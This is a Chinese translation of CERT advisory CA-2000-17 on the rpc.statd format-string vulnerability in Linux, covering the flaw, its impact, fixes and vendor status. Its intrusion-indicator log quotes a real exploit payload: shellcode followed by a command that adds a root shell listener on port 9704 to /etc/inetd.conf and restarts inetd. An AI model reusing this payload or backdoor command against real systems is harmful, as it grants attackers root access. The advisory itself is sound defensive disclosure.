发布日期：2000-08-21
更新日期：2000-08-21

受影响系统：

   运行rpc.statd服务的操作系统

不受影响系统：

描述：

---

CERT 安全公告： CA-2000-17 rpc.statd输入检查问题

发布时间: 2000-8-18
来源: CERT/CC

   

受影响系统：

     * 运行rpc.statd服务的操作系统

综述：

   CERT/CC 已经收到了很多关于rpc.statd可以被远程攻击的报告。这个程序缺省
   安装在很多流行Linux系统中。请查看附录A获取受影响系统的详细信息。
   
   关于这个漏洞的更多的信息可以在下列地址找到：
   
     * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666
     * http://www.securityfocus.com/bid/1480
   (NsFocus: 您也可以在这里看到相关漏洞的中文信息：
     * http://security.nsfocus.com/showQuery.asp?bugID=692 )  

I. 详细描述

   rpc.statd程序将用户提供的数据作为一个格式串直接传给syslog()函数。如果
   缺乏对输入数据的检查，恶意用户可以插入代码并以rpc.statd进程的全选执行，
   通常是以root身份。
   

入侵迹象

   下列内容是从一个被入侵的系统中得到的典型的日志信息：

Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> <8D>^(
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

   如果您看到与上面内容类似的日志记录，我们建议您立刻按照我们的入侵检测列
   表中的步骤检查您的系统。如果您相信您的系统已经被入侵了，请按照我们的入
   侵恢复步骤来操作。
   

II. 影响

   通过进行这种攻击，本地或者远程用户可以以rpc.statd进程的权限执行任意代码，
   通常是root.
   


建议：

---

III. 解决方案

升级您的rpc.statd

   请查看这篇公告的附录A，以得到针对您的系统的更新信息。如果您正在运行一
   个有问题版本的rpc.statd,这个CERT/CC建议您使用相应的厂商的补丁。在升级以
   后，确保重新启动了rpc.statd服务。
   

禁用rpc.statd服务

   如果不能进行升级，CERT/CC推荐您禁用rpc.statd服务。我们建议您谨慎行事，
   因为禁用这个进程可能会对NFS服务产生一些影响。
   

在防火墙上过滤掉不必要的端口

   CERT/CC建议您在防火墙上过滤掉不需要的端口。这个方法并不是针对这个漏洞的，
   但可以阻止外部入侵者攻击您的系统。特别是过滤111(portmapper)端口，外部攻击
   者通常需要连结这个端口以获取rpc.statd的服务端口。
   

附录 A. 厂商信息

   这部分包含了厂商提供的针对这篇公告的一些信息。当我们收到更多的信息时我们
   会更新这个附录。如果你没有看到你的软件厂商的名字，那说明我们没有收到该厂
   商的答复。请直接与您的厂商联系。
   .

Berkeley Software Design, Inc. (BSDI)

   不受此漏洞影响

Caldera, Inc.

   不受此漏洞影响

Compaq

   目前，Compaq正在调查对Compaq的rpc.statd服务的潜在影响。初步的测试表明Compaq
   不受此漏洞影响。
   
Debian

   http://www.debian.org/security/2000/20000719a

FreeBSD

   不受此漏洞影响

NetBSD

   NetBSD 1.4.x 和NetBSD 1.5 不受此漏洞影响；rpc.statd使用syslog()函数时将格式
   化参数当成一个固定字符串对待。

OpenBSD

   不受此漏洞影响

RedHat

   http://www.redhat.com/support/errata/RHSA-2000-043-03.html

Silicon Graphics, Inc.

   不受此漏洞影响
   _________________________________________________________________

   作者：John Shaffer, Brian King
   ______________________________________________________________________

   您可以在下列地址看到这篇文章的英文版:
   http://www.cert.org/advisories/CA-2000-17.html
   ______________________________________________________________________

CERT/CC 联系信息：

   Email: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   

   CERT 网站地址：
   http://www.cert.org/




浏览次数：7134
严重程度：0（网友投票）